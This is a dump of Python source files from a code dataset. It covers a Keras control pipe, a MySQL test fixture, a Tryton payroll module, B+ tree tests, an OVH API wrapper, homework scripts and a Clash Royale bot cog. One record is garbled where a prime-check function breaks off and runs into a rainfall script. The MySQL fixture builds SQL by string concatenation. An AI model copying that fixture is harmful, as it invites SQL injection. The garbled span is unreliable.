+{"seq_id":"48627233","text":"from pipes.pipe import Pipe\n# import keras\nfrom load_data import KEYS\nimport numpy as np\n\nSTRAIGHT_ONLY = True\n\nclass KerasPipe(Pipe):\n\n def __init__(self, filename, threshold=0.5, verbose=False):\n import keras\n self.model = keras.models.load_model(filename)\n self.threshold = threshold\n self.verbose = False\n\n def pipe(self, frame):\n if frame is None:\n return set()\n\n reshaped = frame.reshape((1, 1) + frame.shape)\n results = self.model.predict(reshaped)\n\n keys = set()\n if STRAIGHT_ONLY:\n clazz = np.argmax(results[0])\n keys.add(\"UP\")\n if clazz == 0:\n keys.add(\"LEFT\")\n if clazz == 1:\n keys.add(\"RIGHT\")\n else:\n for i in range(len(KEYS)):\n if results[0][i] > self.threshold:\n keys.add(KEYS[i])\n\n print(keys)\n\n if self.verbose:\n print(\"in shape: {}\".format(reshaped.shape))\n print(\"out shape: {}\".format(results.shape))\n print(\"out vals: {}\".format(results))\n print(\"out set: {}\".format(keys))\n return keys\n\n\n def __enter__(self):\n return self\n\n def __exit__(self, exit_type, value, traceback):\n pass\n","sub_path":"pipes/keras_pipe.py","file_name":"keras_pipe.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"592142302","text":"def asal_mi(x):\r\n i = 2\r\n if x ==1:\r\n return False\r\n elif x==2:\r\n return True\r\n else:\r\n while i 100000] = 0\n temp.append(np.nanmean(data))\n minmaxArray.append(temp)\n\nnp.savetxt('avgRainPerModel_reshaped.csv', minmaxArray, delimiter=',', fmt='%10.5f')","sub_path":"AvgRainPerModel.py","file_name":"AvgRainPerModel.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"52042642","text":"class Solution(object):\n def partition(self, s):\n \"\"\"\n :type s: str\n :rtype: List[List[str]]\n \"\"\"\n # use DFS\n res = []\n self.DFS(res, s, 0, [])\n return res\n\n def DFS(self, res, s, index, path):\n if index == len(s):\n res.append(path)\n return\n for i in xrange(index, len(s)):\n if self.isPalin(s[index:i + 1]):\n self.DFS(res, s, i + 1, path + [s[index:i + 1]])\n return\n\n def isPalin(self, s):\n l, r = 0, len(s) - 1\n while l < r:\n if s[l] != s[r]:\n return False\n l += 1\n r -= 1\n return True","sub_path":"palindrome_partitioning/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"568049234","text":"from pymysql import cursors, connect\nfrom os.path import abspath, dirname, join\nimport configparser as cparser\nfrom pymysql.err import OperationalError\n\n#==============read db_config.ini==============\n\nbase_dir = dirname(dirname(abspath(__file__)))\nfile_path = join(base_dir, 'dev.ini')\nprint(file_path)\n\ncf = cparser.ConfigParser()\ncf.read(file_path)\n\nhost = cf.get('mysqlconf', 'host')\nport = cf.get('mysqlconf', 'port')\ndb = cf.get('mysqlconf', 'db_name')\nuser = cf.get('mysqlconf', 'user')\npassword = cf.get('mysqlconf', 'password')\n\n# ==================encapsulation SQL basic operation===========================\nclass DB:\n def __init__(self):\n try:\n self.connection = connect(host=host,\n port=int(port),\n user=user,\n password=password,\n db=db,\n charset='utf8mb4',\n cursorclass=cursors.DictCursor)\n except OperationalError as e:\n\n print('Mysql Error {}: {}'.format(e.args[0], e.args[1]))\n\n def clear(self, table_name):\n real_sql = \"DELETE FROM \" + table_name + \";\"\n with self.connection.cursor() as cursor:\n cursor.execute('SET FOREIGN_KEY_CHECKS=0;')\n cursor.execute(real_sql)\n print(real_sql)\n self.connection.commit()\n\n def insert(self, table_name, table_data):\n for key in table_data:\n table_data[key] = \"'\" + str(table_data[key]) + \"'\"\n\n key = ','.join(table_data.keys())\n print(key)\n value = ','.join(table_data.values())\n print(value)\n real_sql = 'INSERT INTO ' + table_name + \" (\" + key + \") VALUES (\" + value + \")\"\n print(real_sql)\n with self.connection.cursor() as cursor:\n cursor.execute(real_sql)\n self.connection.commit()\n\n def close(self):\n self.connection.close()\n\n\nif __name__ == '__main__':\n db = DB()\n table_name = 'sign_event'\n data = {'id': 12, 'name': 'hongmi', '`limit`': 2000, 'status': 1, 'address': 'Beijing exhibition center', 'start_time': '2019-08-20 00:25:42'}\n\n db.clear(table_name)\n # db.insert(table_name, data)\n db.close()\n\n","sub_path":"pyrequest/db_fixture/mysql_db.py","file_name":"mysql_db.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"357100817","text":"from trytond.model import ModelSQL, ModelView, fields\nfrom trytond.pyson import Eval, Bool\nfrom trytond.model import Workflow\nfrom trytond.pool import Pool\nfrom trytond.transaction import Transaction\n\n\n_all_ = [\n 'Conveyance_Allowance',\n]\n\n\nclass Conveyance_Allowance(Workflow, ModelSQL, ModelView):\n \"\"\"Employee Conveyance Allowance\"\"\"\n\n __name__ = 'employee_conveyance.allowance'\n\n salary_code = fields.Char('Salary Code',\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n }, depends=['state'])\n employee = fields.Many2One('company.employee', 'Employee Name',\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n }, depends=['state'])\n designation = fields.Many2One('company.employee','Designation')\n department = fields.Many2One('company.employee','Department')\n transport_amount = fields.Float('Transport Amount',\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n }, depends=['state'])\n # vehicle = fields.Selection(\n # [\n # ('yes','Yes'),\n # ('no','No')\n # ], 'Do you have own vehicle')\n # transport = fields.Boolean('Transport') \n\n # vehicle_selection = fields.Selection(\n # [\n # ('motor_car', 'Motor Car'),\n # ('non_vehicle', 'Non Vehicle'),\n # ('scooter', 'Scooter')\n # ], 'Select Type Of Vehicle', states={\n # 'invisible': ~Bool(Eval('vehicle')),\n # 'required': ~Bool(Eval('vehicle')),\n # }, depends=['vehicle'])\n \n # vehicle_regno = fields.Char('Vehicle Registration No.')\n # distance = fields.Selection(\n # [\n # ('1', '201-300 kilometers'),\n # ('2', '301-450 kilometers '),\n # ('3', '451-600 kilometers'),\n # ('3', '601-800 kilometers'),\n # ('3', 'Above 800 kilometers')\n # ], 'Select Travel Distance')\n\n state = fields.Selection(\n [\n ('draft', 'Draft'),\n ('confirm', 'Confirm'),\n ('account_officer', 'Account Officer'),\n ('cancel', 'Cancel'),\n ('approve', 'Approve'),\n \n ], 'Status', readonly=True)\n\n @classmethod\n def __setup__(cls):\n super().__setup__()\n cls._buttons.update({\n \"confirm\": {\n 'invisible': ~Eval('state').in_(\n ['draft'\n ]),\n },\n\n \"submit\": {\n 'invisible': ~Eval('state').in_(\n ['confirm'\n ]),\n },\n\n\n \"cancel\": {\n 'invisible': ~Eval('state').in_(\n ['draft', 'account_officer'\n ]),\n \n },\n\n \"approve\": {\n 'invisible': ~Eval('state').in_(\n ['account_officer'\n ]),\n \n },\n })\n cls._transitions |= set((\n ('draft', 'confirm'),\n ('draft', 'cancel'),\n ('confirm', 'account_officer'),\n ('account_officer', 'approve'),\n ('account_officer', 'cancel'),\n ))\n \n @staticmethod\n def default_state():\n return 'draft'\n\n @classmethod\n @ModelView.button\n @Workflow.transition('confirm')\n def confirm(cls, records):\n pass\n\n @classmethod\n @ModelView.button\n @Workflow.transition('account_officer')\n def submit(cls, records):\n pass\n\n @classmethod\n @ModelView.button\n @Workflow.transition('approve')\n def approve(cls, records):\n pass\n\n @classmethod\n @ModelView.button\n @Workflow.transition('cancel')\n def cancel(cls, records):\n pass\n\n @fields.depends('employee')\n def on_change_employee(self):\n if self.employee:\n self.salary_code = self.employee.salary_code\n self.designation = self.employee.designation\n self.department = self.employee.department\n\n @staticmethod\n def default_employee():\n global current_employee\n current_employee = None\n pool = Pool()\n Employee = pool.get('company.employee')\n employee_id = Transaction().context.get('employee')\n employee = Employee.search([\n ('id', '=', employee_id)\n ])\n if employee != []:\n 
current_employee = employee[0]\n return current_employee.id if current_employee else None\n \n\n # @fields.depends('vehicle', 'vehicle_selection')\n # def on_change_vehicle(self):\n # if self.vehicle != '1':\n # self.vehicle_selection = ''\n\n ","sub_path":"src/modules/customised/payroll_test_2/payroll_currupt/hr_conveyance/hr_conveyance.py","file_name":"hr_conveyance.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"68391697","text":"\"\"\"\nThe functions provided by this module are as follow:\n\n * key frame extraction\n\nBefore using this module, you must install moviepy from pip.\n\"\"\"\n\nimport subprocess\nfrom moviepy.editor import VideoFileClip\nimport os\n\n\ndef key_frame_extraction(video_path, output_image_path, output_image_size=None):\n \"\"\"\n Extracts key frames from a provided video using FFmpeg and writes the frames to output_image_path.\n It will launch FFmpeg.exe and provide cmd line parameters to complete the task. So you must make\n sure that FFmpeg.exe has been added to the environment variable or running directory.\n\n Warnings:\n If you want to use it in a production environment, you still need to consider many details. Some\n of them are:\n * Correctly handles error conditions.\n * Provides progress prompt.\n * Supports more flexible image output methods.\n\n :param video_path:\n The path of the video used to extract key frames.\n\n :param output_image_path:\n The output path of the key frame image. If the path is not ended by a character '/' or '\\',\n it will be added.\n\n :param output_image_size:\n The size of the key frame image. It will be a tuple or a list that contains width and height,\n such as [width, height] or (width, height). The default value of None means that the image\n size is consistent with the original video size.\n\n :return:None\n \"\"\"\n if output_image_size is None:\n clip = VideoFileClip(video_path)\n output_image_size = clip.size\n\n if output_image_path != '' and (output_image_path[-1] != '/' or output_image_path[-1] != '\\\\'):\n output_image_path += '/'\n\n if not os.path.exists(output_image_path):\n os.makedirs(output_image_path)\n\n out = subprocess.check_output(('G:/DrawMusic/FrameExtract', '-i', video_path, \"-o\",\n output_image_path + 'keyframe-%03d.png',\n \"-d\", \"0\", \"-S\", \"30\")).decode().split()\n\n print(out)\n return dict(enumerate(out))\n","sub_path":"ffmpeg_tools.py","file_name":"ffmpeg_tools.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"390549297","text":"import itertools\nimport os\n\nimport pytest\n\nfrom bplustree.memory import Memory, FileMemory, Fsync\nfrom bplustree.node import LonelyRootNode, LeafNode\nfrom bplustree.tree import BPlusTree\n\nfilename = '/tmp/bplustree-testfile.index'\n\n\n@pytest.fixture\ndef clean_file():\n if os.path.isfile(filename):\n os.unlink(filename)\n yield\n if os.path.isfile(filename):\n os.unlink(filename)\n\n\n@pytest.fixture\ndef b():\n b = BPlusTree()\n yield b\n b.close()\n\n\ndef test_create_in_memory(b):\n assert isinstance(b._mem, Memory)\n\n\ndef test_create_and_load_file(clean_file):\n b = BPlusTree(filename=filename)\n assert isinstance(b._mem, FileMemory)\n b.insert(5, b'foo')\n b.close()\n\n b = BPlusTree(filename=filename)\n assert isinstance(b._mem, FileMemory)\n assert b.get(5) == b'foo'\n b.close()\n\n\ndef test_initial_values():\n b = BPlusTree(page_size=512, value_size=128)\n assert b._tree_conf.page_size == 512\n assert b._tree_conf.order == 4\n assert b._tree_conf.key_size == 16\n assert b._tree_conf.value_size == 128\n b.close()\n\n\ndef test_partial_constructors(b):\n node = b.RootNode()\n record = b.Record()\n assert node._tree_conf == b._tree_conf\n assert record._tree_conf == b._tree_conf\n\n\ndef test_get_tree(b):\n b.insert(1, b'foo')\n assert b.get(1) == b'foo'\n assert b.get(2) is None\n assert b.get(2, 'bar') == 'bar'\n\n\ndef test_contains_tree(b):\n b.insert(1, b'foo')\n assert 1 in b\n assert 2 not in b\n\n\ndef test_len_tree(b):\n assert len(b) == 0\n b.insert(1, b'foo')\n assert len(b) == 1\n for i in range(2, 101):\n b.insert(i, str(i).encode())\n assert len(b) == 100\n\n\ndef test_length_hint_tree():\n b = BPlusTree(order=100)\n assert b.__length_hint__() == 49\n b.insert(1, b'foo')\n assert b.__length_hint__() == 49\n for i in range(2, 10001):\n b.insert(i, str(i).encode())\n assert b.__length_hint__() == 7242\n b.close()\n\n\ndef test_bool_tree(b):\n assert not b\n b.insert(1, b'foo')\n assert b\n\n\ndef test_iter_keys_values_items_tree(b):\n # Empty tree\n iter = b.__iter__()\n with pytest.raises(StopIteration):\n next(iter)\n\n # Insert in reverse...\n for i in range(1000, 0, -1):\n b.insert(i, str(i).encode())\n # ...iter in order\n previous = 0\n for i in b:\n assert i == previous + 1\n previous += 1\n\n # Test .keys()\n previous = 0\n for i in b.keys():\n assert i == previous + 1\n previous += 1\n\n # Test .values()\n previous = 0\n for i in b.values():\n assert int(i.decode()) == previous + 1\n previous += 1\n\n # Test .items()\n previous = 0\n for k, v in b.items():\n expected = previous + 1\n assert (k, int(v.decode())) == (expected, expected)\n previous += 1\n\n\ndef test_iter_slice(b):\n with pytest.raises(ValueError):\n next(b._iter_slice(slice(None, None, -1)))\n\n with pytest.raises(ValueError):\n next(b._iter_slice(slice(10, 0, None)))\n\n # Contains from 0 to 9 included\n for i in range(10):\n b.insert(i, str(i).encode())\n\n iter = b._iter_slice(slice(None, 2))\n assert next(iter).key == 0\n assert next(iter).key == 1\n with pytest.raises(StopIteration):\n next(iter)\n\n iter = b._iter_slice(slice(5, 7))\n assert next(iter).key == 5\n assert next(iter).key == 6\n with pytest.raises(StopIteration):\n next(iter)\n\n iter = b._iter_slice(slice(8, 9))\n assert next(iter).key == 8\n with pytest.raises(StopIteration):\n next(iter)\n\n iter = b._iter_slice(slice(9, 12))\n assert next(iter).key == 9\n with pytest.raises(StopIteration):\n next(iter)\n\n iter = b._iter_slice(slice(15, 17))\n with pytest.raises(StopIteration):\n 
next(iter)\n\n iter = b._iter_slice(slice(-2, 17))\n assert next(iter).key == 0\n\n # Contains from 10, 20, 30 .. 200\n b2 = BPlusTree(order=5)\n for i in range(10, 201, 10):\n b.insert(i, str(i).encode())\n\n iter = b._iter_slice(slice(65, 85))\n assert next(iter).key == 70\n assert next(iter).key == 80\n with pytest.raises(StopIteration):\n next(iter)\n\n b2.close()\n\n\ndef test_left_record_node_in_tree():\n b = BPlusTree(order=3)\n assert b._left_record_node == b._root_node\n assert isinstance(b._left_record_node, LonelyRootNode)\n b.insert(1, b'1')\n b.insert(2, b'2')\n b.insert(2, b'2')\n assert isinstance(b._left_record_node, LeafNode)\n b.close()\n\niterators = [\n range(0, 1000, 1),\n range(1000, 0, -1),\n list(range(0, 1000, 2)) + list(range(1, 1000, 2))\n]\norders = [3, 4, 50]\npage_sizes = [4096, 8192]\nkey_sizes = [4, 16]\nvalues_sizes = [4, 16]\nfile_names = [None, filename]\nmatrix = itertools.product(iterators, orders, page_sizes,\n key_sizes, values_sizes, file_names)\n\n\n@pytest.mark.parametrize('iterator,order,page_size,k_size,v_size,filename',\n matrix)\ndef test_insert_split_in_tree(iterator, order, page_size, k_size, v_size,\n filename, clean_file):\n inserted = set()\n\n b = BPlusTree(filename=filename, order=order, page_size=page_size,\n key_size=k_size, value_size=v_size, fsync=Fsync.NEVER)\n\n for i in iterator:\n b.insert(i, str(i).encode())\n inserted.add(i)\n\n if filename:\n # Reload tree from file before checking values\n b.close()\n b = BPlusTree(filename=filename, order=order, page_size=page_size,\n key_size=k_size, value_size=v_size)\n\n for x in inserted:\n assert b.get(x) == str(x).encode()\n\n b.close()\n","sub_path":"tests/test_tree.py","file_name":"test_tree.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"630368850","text":"#!/usr/bin/env python3\n\nimport os\nimport ovh\nimport pickle\n\nCACHE_FILE = 'cache.pickle'\n\nclass OvhConnect:\n def __init__(self, dom, appkey, secret, conskey):\n self.conskey = conskey\n self.secret = secret\n self.appkey = appkey\n self.dom = dom\n\n def __enter__(self):\n self.client = ovh.Client(\n endpoint='ovh-eu',\n application_key=self.appkey,\n application_secret=self.secret,\n consumer_key=self.conskey,\n )\n print(\"login successfull\")\n return OvhRedirectsApi(self.dom, self.client)\n\n def __exit__(self, type, value, traceback):\n pass\n\n\nclass OvhRedirectsApi:\n def __init__(self, domain, client):\n self.client = client\n self.domain = domain\n self.cached_redirects = {}\n self.read_cache()\n\n def add(self, origin, destination):\n return self.client.post('/email/domain/%s/redirection' % self.domain,\n _from=origin,\n to=destination,\n localCopy=False)\n\n def read_cache(self):\n if os.path.exists(CACHE_FILE):\n with open(CACHE_FILE, 'rb') as f:\n self.cached_redirects = pickle.load(f)['redirects']\n\n def write_cache(self):\n with open(CACHE_FILE, 'wb') as f:\n pickle.dump({'redirects': self.cached_redirects}, f)\n\n def get(self, id):\n if id in self.cached_redirects:\n return self.cached_redirects[id]\n else:\n red = self.fetch(id)\n self.cached_redirects[red['id']] = red\n self.write_cache()\n return red\n\n def fetch(self, id):\n print(\"fetching non-cached redirect %s \" % id)\n return self.client.get('/email/domain/%s/redirection/%s' % (self.domain, id))\n\n def remove(self, id):\n return self.client.delete('/email/domain/%s/redirection/%s' % (self.domain, id))\n\n def list(self):\n print(\"asking for redirs id list...\")\n ids = self.client.get('/email/domain/%s/redirection' % self.domain)\n print(\"asking for redirects for each id...\")\n list = [self.get(id) for id in ids]\n\n return list\n\n","sub_path":"ovhwrapper.py","file_name":"ovhwrapper.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"595571012","text":"\n__author__ = 'Ермиличев Никита Дмитриевич'\n\n# Задание-1:\n# Написать программу, выполняющую операции (сложение и вычитание) с простыми дробями.\n# Дроби вводятся и выводятся в формате:\n# n x/y ,где n - целая часть, x - числитель, у - знаменатель.\n# Дроби могут быть отрицательные и не иметь целой части, или иметь только целую часть.\n# Примеры:\n# Ввод: 5/6 + 4/7 (всё выражение вводится целиком в виде строки)\n# Вывод: 1 17/42 (результат обязательно упростить и выделить целую часть)\n# Ввод: -2/3 - -2\n# Вывод: 1 1/3\n\nprint(\"\"\"\n#######################################\n# #\n# Задание 1 #\n# #\n#######################################\n\"\"\")\n\ndef get_result(formula):\n operation_dict = {\n 'sub': ' - ',\n 'add': ' + '\n }\n\n def get_main_operation(condition):\n if condition.find(' - ') > 0:\n return 'sub'\n if condition.find(' + ') > 0:\n return 'add'\n return False\n\n\n\n operator = get_main_operation(formula)\n\n if operator:\n operands = formula.split(operation_dict[operator])\n operand_list = []\n #есть ли целая часть\n for operand in operands:\n full = 0\n if ' ' in operand:\n full = int(operand.split(' ')[0])\n operand = operand.split(' ')[1]\n\n if '/' in operand:\n muls = list(map(int,operand.split('/')))\n else:\n muls = [int(operand),1]\n full = 0\n\n operand_list.append({\n 'full':full,\n 'operand':operand,\n 'muls': muls\n })\n\n\n val_1 = operand_list[0]['full'] + operand_list[0]['muls'][0] / operand_list[0]['muls'][1]\n val_2 = operand_list[1]['full'] + operand_list[1]['muls'][0] / operand_list[1]['muls'][1]\n\n formula_result = eval(str(val_1) + operation_dict[operator] + str(val_2))\n\n new_full_part = int(formula_result)\n new_dec_part = formula_result - int(formula_result)\n\n mul2 = operand_list[0]['muls'][1] * operand_list[1]['muls'][1]\n mul1 = round(new_dec_part * mul2)\n\n result_string = '';\n\n if new_full_part != 0:\n result_string = str(new_full_part)+' ';\n\n if mul1 != 0:\n result_string += str(mul1)+'/'+str(mul2)\n\n return result_string\n\n#заменить на input\nprint(\"5/6 + 4/7 =\", get_result(\"5/6 + 4/7\"))\nprint(\"-2/3 - -2 =\", get_result(\"-2/3 - -2\"))\nprint(\"4 -2/3 - -2 =\", get_result(\"4 -2/3 - -2\"))\n\n# Задание-2:\n# Дана ведомость расчета заработной платы (файл \"data/workers\").\n# Рассчитайте зарплату всех работников, зная что они получат полный оклад,\n# если отработают норму часов. 
Если же они отработали меньше нормы,\n# то их ЗП уменьшается пропорционально, а за заждый час переработки\n# они получают удвоенную ЗП, пропорциональную норме.\n# Кол-во часов, которые были отработаны, указаны в файле \"data/hours_of\"\n\nprint(\"\"\"\n#######################################\n# #\n# Задание 2 #\n# #\n#######################################\n\"\"\")\n\nimport os\nimport json\n\ndef get_actual_salary(salary, plan, fact):\n if fact == 0:\n return 0\n return plan/fact*salary\n\nwith open(os.path.join(\"data\", \"workers.json\"), \"r\", encoding=\"UTF-8\") as file:\n worker_data = json.load(file)\n file.close()\n\nwith open(os.path.join(\"data\", \"hours_of.json\"), \"r\", encoding=\"UTF-8\") as file:\n hours_data = json.load(file)\n file.close()\n\nhours_worker = list(map(int, list(hours_data.keys())))\n\nfor worker in worker_data['workers']:\n if worker['id'] in hours_worker:\n hours = worker['hourRate']\n fact_hours = hours_data[str(worker['id'])]\n salary = worker['salary']\n fact_salary = get_actual_salary(salary, hours, fact_hours)\n\n print(f\"{worker['firstName']} {worker['lastName']} заработал: {fact_salary} (план: {hours}, факт: {fact_hours}, ЗП: {salary})\")\n else:\n print(f\"По сотруднику \\\"{worker['firstName']} {worker['lastName']}\\\" нет данных\")\n\n# Задание-3:\n# Дан файл (\"data/fruits\") со списком фруктов.\n# Записать в новые файлы все фрукты, начинающиеся с определенной буквы.\n# Т.е. в одном файле будут все фрукты на букву “А”, во втором на “Б” и т.д.\n# Файлы назвать соответственно.\n# Пример имен файлов: fruits_А, fruits_Б, fruits_В ….\n# Важно! Обратите внимание, что нет фруктов, начинающихся с некоторых букв.\n# Напишите универсальный код, который будет работать с любым списком фруктов\n# и распределять по файлам в зависимости от первых букв, имеющихся в списке фруктов.\n# Подсказка:\n# Чтобы получить список больших букв русского алфавита:\n# print(list(map(chr, range(ord('А'), ord('Я')+1))))\n#\nprint(\"\"\"\n#######################################\n# #\n# Задание 3 #\n# #\n#######################################\n\"\"\")\n\nimport os\nimport json\n\nwith open(os.path.join(\"data\", \"fruits\"), \"r\", encoding=\"UTF-8\") as file:\n fruits = file.read().split('\\n')\n file.close()\n\nfruits_dict = {}\nchar_list = list(map(chr, range(ord('А'), ord('Я')+1)))\n\nfor find_char in char_list:\n fruits_by_char = list(filter(lambda first: len(first) > 0 and first[0] == find_char, fruits))\n if(len(fruits_by_char) > 0):\n file_name = find_char+\"_fruits\"\n with open(os.path.join(\"data\", \"result_fruits\", file_name), \"w\", encoding=\"UTF-8\") as file:\n for fruit_item in fruits_by_char:\n file.write(f\"{fruit_item}\\n\")\n print(f\"Записан файл {file_name}. Количество фруктов: {len(fruits_by_char)}\")\n file.close()\n","sub_path":"lesson03/hw03_hard.py","file_name":"hw03_hard.py","file_ext":"py","file_size_in_byte":6967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
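For Task 1, the float-based reconstruction above relies on round() and does not reduce the resulting fraction; the standard fractions module does the arithmetic and the reduction exactly. A compact alternative sketch (same 'n x/y' input format, not the author's solution):

from fractions import Fraction


def eval_fraction_expr(expr):
    """Evaluate 'a + b' or 'a - b' where operands look like '5/6', '-2' or '1 2/3'."""
    op = ' + ' if ' + ' in expr else ' - '
    left, right = expr.split(op)

    def parse(token):
        parts = token.split(' ')
        if len(parts) == 2:  # mixed number 'n x/y'
            whole, frac = Fraction(parts[0]), Fraction(parts[1])
            return whole - frac if whole < 0 else whole + frac
        return Fraction(parts[0])  # plain 'x/y' or integer

    result = parse(left) + parse(right) if op == ' + ' else parse(left) - parse(right)
    sign = '-' if result < 0 else ''
    whole, rem = divmod(abs(result.numerator), result.denominator)
    if rem == 0:
        return '{}{}'.format(sign, whole)
    if whole == 0:
        return '{}{}/{}'.format(sign, rem, result.denominator)
    return '{}{} {}/{}'.format(sign, whole, rem, result.denominator)


print(eval_fraction_expr('5/6 + 4/7'))  # 1 17/42
print(eval_fraction_expr('-2/3 - -2'))  # 1 1/3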
+{"seq_id":"405481784","text":"#Ryan Jonnada\n#I pledge that I have abided by the Stevens Honor System\n\ndef main():\n is_valid = True\n months_w_31_days = [1,3,5,7,8,10,12]\n date= input('Enter a date in mm/dd/yyy format:')\n date_list = date.split('/')\n if len(date_list) !=3:\n is_valid = False\n else:\n month, day, year = date_list\n\n try:\n month = int(month)\n day = int(day)\n year = int(year)\n if month > 12 or month < 1 or day > 31 or day <1 or year < 1:\n is_valid = False\n elif month not in months_w_31_days and day == 31:\n is_valid = False\n\n except:\n is_valid = False\n\n if is_valid:\n print(\"That is a valid date.\")\n else:\n print(\"That is not a valid date.\")\n\nmain()\n \n","sub_path":"2020F_hw6_submissions/jonnadaryan/RyanJonnadaCh7P2.py","file_name":"RyanJonnadaCh7P2.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"429072817","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 28 21:04:38 2019\n\n@author: eebjw\n\"\"\"\n\nimport numpy as np\nimport cartopy.crs as ccrs\nfrom matplotlib.colors import BoundaryNorm\nimport cartopy\nfrom cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\nimport cartopy.feature as cfeature\n\n'''Setup for maps'''\nproj = ccrs.PlateCarree(central_longitude=0) \nlakes_50m = cfeature.NaturalEarthFeature('physical', 'lakes', '50m',edgecolor='k',facecolor=cfeature.COLORS['water'])\nland_50m = cfeature.NaturalEarthFeature('physical', 'land', '50m',edgecolor='k',facecolor='none')\ncountries_50m = cartopy.feature.NaturalEarthFeature('cultural','admin_0_countries','50m',edgecolor='k',facecolor='none')\n\ndef plot_map(ax,X,Y,data,cmap,levels):\n \n norm = BoundaryNorm(levels, ncolors=cmap.N, clip=False)\n ax.set_extent([np.min(X), np.max(X), np.min(Y), np.max(Y)], proj)\n ax.coastlines('50m')\n ax.add_feature(land_50m, linewidth=0.5)\n ax.add_feature(countries_50m, linewidth=0.5) \n ax.add_feature(lakes_50m, linewidth=0.5)\n gl = ax.gridlines(crs=ccrs.PlateCarree(), draw_labels=True)\n gl.xlines = False\n gl.ylines = False\n gl.xlabels_top = False\n gl.ylabels_right = False\n gl.xlabel_style = {'size': 6, 'rotation': 90}\n gl.ylabel_style = {'size': 6}\n gl.xformatter = LONGITUDE_FORMATTER\n gl.yformatter = LATITUDE_FORMATTER\n im = ax.pcolormesh(X, Y, data, cmap=cmap, norm=norm)\n \n return ax,im","sub_path":"plot_map.py","file_name":"plot_map.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"467947512","text":"import pygit2\nimport argparse\nimport json\n\ndef format_component(submod):\n return {\"component\":{\"type\":\"git\",\"git\":{\"commitHash\":str(submod.head_id), \"repositoryUrl\":str(submod.url)}}}\n\ndef process_component(repo):\n return [repo.lookup_submodule(submod) for submod in repo.listall_submodules()]\n\ndef recursive_process(base_repo):\n processed_subs = []\n repos_to_process = [base_repo]\n while repos_to_process:\n repo = repos_to_process.pop()\n submodules = process_component(repo)\n processed_subs.extend(submodules)\n repos_to_process.extend([mod.open() for mod in submodules])\n return {\"Registrations\":[format_component(component) for component in processed_subs]}\n\ndef main(repo_path, output_file):\n repo = pygit2.Repository(repo_path)\n registrations = recursive_process(repo)\n with open(output_file, 'w') as f:\n json.dump(registrations, f, indent=4, sort_keys=True)\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"base_repository\", help=\"path to base repository to get registrations for.\")\n parser.add_argument(\"-o\", \"--output\", help=\"output file name.\", default=\"cgmanifest.json\")\n args = parser.parse_args()\n main(args.base_repository, args.output)\n\n","sub_path":"tools/python/get_submodules.py","file_name":"get_submodules.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"120503866","text":"import discord\nfrom discord.ext import commands\nfrom .utils.dataIO import dataIO, fileIO\nimport os\nfrom __main__ import send_cmd_help\nimport time\nimport clashroyale as clashroyaleAPI\n\nBOTCOMMANDER_ROLES = [\"Family Representative\", \"Clan Manager\",\n \"Clan Deputy\", \"Co-Leader\", \"Hub Officer\", \"admin\"]\n\ncreditIcon = \"https://i.imgur.com/TP8GXZb.png\"\ncredits = \"Bot by GR8 | Titan\"\n\n\nclass clashroyale:\n \"\"\"Live statistics for Clash Royale\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n self.auth = self.bot.get_cog('crtools').auth\n self.tags = self.bot.get_cog('crtools').tags\n self.clans = self.bot.get_cog('crtools').clans\n self.clash = clashroyaleAPI.RoyaleAPI(self.auth.getToken(), is_async=True)\n\n def getCards(self, maxPlayers):\n \"\"\"Converts maxPlayers to Cards\"\"\"\n cards = {\n \"50\": 25,\n \"100\": 100,\n \"200\": 400,\n \"1000\": 2000\n }\n return cards[str(maxPlayers)]\n\n def getCoins(self, maxPlayers):\n \"\"\"Converts maxPlayers to Coins\"\"\"\n coins = {\n \"50\": 175,\n \"100\": 700,\n \"200\": 2800,\n \"1000\": 14000\n }\n return coins[str(maxPlayers)]\n\n def emoji(self, name):\n \"\"\"Emoji by name.\"\"\"\n for emoji in self.bot.get_all_emojis():\n if emoji.name == name:\n return '<:{}:{}>'.format(emoji.name, emoji.id)\n return ''\n\n async def getClanEmoji(self, tag):\n \"\"\"Check if emoji exists for the clan\"\"\"\n clankey = await self.clans.getClanKey(tag)\n if clankey is not None:\n return await self.clans.getClanData(clankey, 'emoji')\n return self.emoji(\"clan\")\n\n def getLeagueEmoji(self, trophies):\n \"\"\"Get clan war League Emoji\"\"\"\n if trophies >= 3000:\n return self.emoji(\"legendleague\")\n elif trophies >= 1500:\n return self.emoji(\"goldleague\")\n elif trophies >= 600:\n return self.emoji(\"silverleague\")\n else:\n return self.emoji(\"bronzeleague\")\n\n async def getClanWarTrophies(self, tag):\n 